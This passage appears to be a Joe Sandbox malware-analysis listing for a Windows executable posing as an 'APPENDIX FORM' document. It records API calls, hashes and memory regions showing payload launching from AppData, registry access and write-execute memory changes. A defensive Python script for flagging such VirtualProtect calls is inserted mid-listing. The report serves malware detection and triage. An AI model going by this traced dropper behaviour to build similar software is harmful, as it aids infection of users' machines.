• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
• Instruction ID: 7786a64bfaa5797d935d651185307358bb9d4d120c35d0410611ad8c6d49fe89
• Opcode Fuzzy Hash: 1c898c40f4255edd407dd83f9c9e53847d876c5e3b3b92bcfc21a2c66a14f794
• Instruction Fuzzy Hash: AD314A7150121AFBDF20DF55ED44A9A3BBCEB04395F20803AF904E61D0D375DA40EBA9
APIs
• GlobalFree.KERNEL32(0059B630), ref: 00401B80
• GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$AllocFree
• String ID: Call
• API String ID: 3394109436-1824292864
• Opcode ID: f88b08bc8d5f376a5c5648046b026067f98e21d0471fe8a9f7438a1af9f95ecf
• Instruction ID: 6cbcdb755c73408299f3b34f06e63cd38c4bb374d12efaab4e5d10ed2e92c467
• Opcode Fuzzy Hash: f88b08bc8d5f376a5c5648046b026067f98e21d0471fe8a9f7438a1af9f95ecf
• Instruction Fuzzy Hash: 8421C3B6A04200ABDB10EBA4DE89A5F73B4EB44314754853BF101F72D1D77CE8118B5E
APIs
  • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
  • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
  • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
  • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
  • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
  • Part of subcall function 00405493: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B8
  • Part of subcall function 00405493: CloseHandle.KERNEL32(?), ref: 004054C5
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
• String ID:
• API String ID: 3521207402-0
• Opcode ID: a7607efde6f1a1c3f748ff42ea39b94a3370956cc0df1f3cfb62896769584e29
• Instruction ID: 57ae1163c755c1138baaca950cb608618e2418985212f992553cdef3dd7e82e0
• Opcode Fuzzy Hash: a7607efde6f1a1c3f748ff42ea39b94a3370956cc0df1f3cfb62896769584e29
• Instruction Fuzzy Hash: 55015771904118ABDF20AFA1D9459AE7BB1EB00345F10853BFA01B51E1C7788A82DBAA
APIs
• RegOpenKeyExA.KERNELBASE(80000002,00405E0C,00000000,00000002,?,00000002,?,?,00405E0C,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405BF0
• RegQueryValueExA.KERNELBASE(?,?,00000000,00405E0C,?,00405E0C), ref: 00405C11
• RegCloseKey.KERNELBASE(?), ref: 00405C32
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
• Instruction ID: cc704c53ed908c99e7017086828a6fa8a2a616e1108b641e5e4d636184f813ef
• Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
• Instruction Fuzzy Hash: 2E015A7154420EEFEB228F65EC44AEB3FACEF14354F004436F904A6220D235D964CBA5
APIs
  • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
• RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040246A
• RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040247D
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Enum$CloseOpenValue
• String ID:
• API String ID: 167947723-0
• Opcode ID: 0880f7cfda8faa2fb4012732a1283442b1253d14d35797f1991064d50f285c21
• Instruction ID: 6115cc5812015acb5f7b2ec9ce6142d8c9ddac967d61c7271631ff2633e17099
• Opcode Fuzzy Hash: 0880f7cfda8faa2fb4012732a1283442b1253d14d35797f1991064d50f285c21
• Instruction Fuzzy Hash: 87F0D671904200EFEB11DF649E8DE7F7A6CDB40348F10443EF401A61C0D6B85E41D62A
APIs
• ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen,?), ref: 00401E1E
Strings
• C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen, xrefs: 00401E09
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ExecuteShell
• String ID: C:\Users\user\AppData\Roaming\Orkestral\Vaginovesical41\biogeochemistry\bevbningen
• API String ID: 587946157-3057813021
• Opcode ID: 68b7f21b2f1562d818b67ad27029afae5d9eed81903b3053ccafb51aec8e9597
• Instruction ID: 5d73ee335cbbab12fdd0ba64fc8bec716ed4f15c46e5d3bc63f2db2428fb96dc
• Opcode Fuzzy Hash: 68b7f21b2f1562d818b67ad27029afae5d9eed81903b3053ccafb51aec8e9597
• Instruction Fuzzy Hash: 2CF0C2B2B041006ADB41ABB59E4AE5D3AA4EB41318F240A3AE000F61C2D9BD8842F718
APIs
• VirtualAllocEx.KERNELBASE(00000000), ref: 100028C7
• GetLastError.KERNEL32 ref: 100029CE
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: AllocErrorLastVirtual
• String ID:
• API String ID: 497505419-0
• Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
• Instruction ID: 979422ec210ed56ae706f471070eab414bbcd449115fcdff0f0e209e3c03d579
• Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
• Instruction Fuzzy Hash: 015193BA908215DFF710DF64DCC675977B4EB443D4F21842AEA08E722DCF34A9818B54
APIs
  • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
• RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023FA
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402492
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3677997916-0
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402B09: RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
                                                                                                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022E1
                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004022EA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 849931509-0
                                                                                                              APIs
                                                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                                                                                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentExpandStringslstrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1938659011-0
                                                                                                              APIs
                                                                                                              • ShowWindow.USER32(00000000,00000000,?), ref: 00401DC2
                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$EnableShow
                                                                                                              • String ID:
                                                                                                              • API String ID: 1136574915-0
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNELBASE(?,00402CBE,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 00405975
                                                                                                              • CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405997
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCreate
                                                                                                              • String ID:
                                                                                                              • API String ID: 415043291-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2111968516-0
                                                                                                              • Opcode ID: 3e304d8c12eabbb03c9e3c1771f07a0ab05c9e108d19b4d7458f43478658592c
                                                                                                              • Instruction ID: 18492603db55a8b86d8a8ed5bb13c4a1e056a526420789b3d2d2d196f0fb5020
                                                                                                              • Opcode Fuzzy Hash: 3e304d8c12eabbb03c9e3c1771f07a0ab05c9e108d19b4d7458f43478658592c
                                                                                                              • Instruction Fuzzy Hash: 0221C971D04299FEDF215F6449652BEBFB49B01304F24807BE490B63D1D1BC8985CB6D
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 0040166B
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileMove
• String ID:
• API String ID: 3562171763-0
• Opcode ID: 36159cba8800d61292664bb1bb8cba1ffc953a996d1ebe6357e800a3fac8d15b
• Instruction ID: 19f5f029a12147ab093ae7c4dd676a36e5c13e74b16b106adef5664a943e3e94
• Opcode Fuzzy Hash: 36159cba8800d61292664bb1bb8cba1ffc953a996d1ebe6357e800a3fac8d15b
• Instruction Fuzzy Hash: 8BF0E972A08111A3CF10B7B64E0DD5F22A09F81328F24473BF111B61D5EABC8602E55F
APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402276
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
• Opcode ID: 2a1b67edb7300a1b9d21921cbb3cb49bcdef4d08f11d63e8f50844b58ccc5810
• Instruction ID: dff1fc4e61f6baddcfaee85270a2ae07bc7b47d3ff6ea6eee97db9607061b2c7
• Opcode Fuzzy Hash: 2a1b67edb7300a1b9d21921cbb3cb49bcdef4d08f11d63e8f50844b58ccc5810
• Instruction Fuzzy Hash: CCE04F72B041756ADB903AF10E8DD7F21597B84344F24067EF601B62CAD9BC0D42626D
APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025EF
  • Part of subcall function 00405C3E: wsprintfA.USER32 ref: 00405C4B
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
• Opcode ID: 8eeb5724a902b088ea0ac8a4b68ae52a49c1b4adeb651dce3c54b51496f1246f
• Instruction ID: 6db1108a9ca3914f7536824f3a0b792d65d6e21d285b9896dce2249a608d269e
• Opcode Fuzzy Hash: 8eeb5724a902b088ea0ac8a4b68ae52a49c1b4adeb651dce3c54b51496f1246f
• Instruction Fuzzy Hash: 1DE04FB6A05214ABEB05BBA55E4A9BF676CDB50309B14853BF201F00C1D27D48429A6E
APIs
• RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
• Instruction ID: 4590d5e2027941592e20b0923a4b77f22b5e160f374441c3e06abea31f55e5d0
• Opcode Fuzzy Hash: 59767c2edb534c3f58a8ee372d4634957363a65fc0f8af2da0bcbdd5c2bc752e
• Instruction Fuzzy Hash: BEE0B6B6250109AADB40EFA5ED4AFA677ECFB18705F008125B608E7091CA78E5509B69
APIs
• ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00412888,0040A888,004031CB,00409130,00409130,004030BD,00412888,00004000,?,00000000,?), ref: 004059FD
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
• Instruction ID: 076bffedcae8d219f388724cca679ee572ad848808916985299d83b930ade598
• Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
• Instruction Fuzzy Hash: D2E0BF32654559ABDF10AE559C40AAB775CEB45250F004532BA15F3150D231E8219FA9
APIs
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002749
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction ID: 613cc9569cd6a3d00a1f47a4ee862bcf7314d86cb88ec258730dacc451f16298
• Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction Fuzzy Hash: B0F092F15092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB3441448B19
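The VirtualProtect entry above is the one worth reading closely when triaging this listing: it requests protection 00000040 (PAGE_EXECUTE_READWRITE) on 4 bytes at 1000404C, an address the dump source places inside the module loaded at 10000000, which is the behaviour the report's "changes PE section rights" signature is built on. The following Python is an added example, not Joe Sandbox code and not code from the sample: it parses entries in this listing's format (the "APIs" line with its arguments and ref address, then the "Source File" and "Associated" dump names) and flags VirtualProtect calls that grant write+execute on the calling module's own image. The sample input is copied from two entries on this page. One assumption is mine: the listing gives region start addresses but not sizes, so the code treats consecutive .sdmp regions of a module as contiguous, with the last one at least one 0x1000 page long.

```python
"""Parse "APIs" / "Memory Dump Source" entries from a Joe Sandbox function listing
and flag VirtualProtect calls that make memory of an already-mapped module
writable and executable.

Added example for this page; not Joe Sandbox code and not code from the sample.
ASSUMPTION: consecutive .sdmp regions of one module are contiguous and the
last one is at least PAGE_SIZE bytes long; the listing gives region starts only.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: two entries copied from this report.
SAMPLE = """\
APIs
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002749
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
APIs
• RegOpenKeyExA.KERNELBASE(00000000,00000977,00000000,00000022,00000000,?,?), ref: 00402B31
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
"""

PAGE_SIZE = 0x1000
PAGE_EXECUTE_READWRITE = 0x40   # Win32 memory-protection constants
PAGE_EXECUTE_WRITECOPY = 0x80

API_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SOURCE_RE = re.compile(r"^•\s*Source File:.*?Offset:\s*(?P<base>[0-9A-Fa-f]+)")
REGION_RE = re.compile(r"\.(?P<start>[0-9A-Fa-f]{16})\.")   # the 16-digit address field of an .sdmp name


@dataclass
class Entry:
    api: str
    module: str
    args: List[Optional[int]]        # None where the sandbox printed '?'
    ref: int
    base: Optional[int] = None       # "Offset:" of the source dump
    regions: List[int] = field(default_factory=list)

    def in_module(self, addr: int) -> bool:
        """True if addr falls within the dumped regions of this entry's module (see ASSUMPTION above)."""
        return bool(self.regions) and min(self.regions) <= addr < max(self.regions) + PAGE_SIZE


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_entries(text: str) -> List[Entry]:
    """Group each '• Api.Module(args), ref: addr' line with the dump lines that follow it."""
    entries: List[Entry] = []
    cur: Optional[Entry] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [_arg(a) for a in m["args"].split(",") if a.strip()]
            cur = Entry(m["api"], m["module"], args, int(m["ref"], 16))
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = SOURCE_RE.match(line)
        if m:
            cur.base = int(m["base"], 16)
        if line.startswith("• Source File:") or line.startswith("• Associated:"):
            r = REGION_RE.search(line)
            if r:
                cur.regions.append(int(r["start"], 16))
    return entries


def flag_section_rights_changes(entries: List[Entry]):
    """Return (entry, note) pairs for VirtualProtect calls granting W+X memory, noting whether the
    target lies inside the calling module's own dumped image."""
    hits = []
    for e in entries:
        if e.api != "VirtualProtect" or len(e.args) < 3:
            continue
        addr, size, prot = e.args[0], e.args[1], e.args[2]
        if addr is None or prot is None or not prot & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY):
            continue
        where = "inside" if e.in_module(addr) else "outside"
        base = f"{e.base:08X}" if e.base is not None else "unknown"
        hits.append((e, f"VirtualProtect(0x{addr:08X}, {size}, 0x{prot:02X}) at {e.ref:08X}: W+X {where} module base {base}"))
    return hits


if __name__ == "__main__":
    for _, note in flag_section_rights_changes(parse_entries(SAMPLE)):
        print(note)
```

Run against the full listing, the same parser turns every "APIs" entry into a record you can filter on (API name, argument constants, ref address, owning module), so the RegOpenKeyExA, ReadFile and SetFileAttributesA entries on this page can be grouped by module base in the same pass; the region heuristic only matters for the in_module check and should be replaced with real section sizes if you have the PE at hand.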
APIs
• GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B4
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
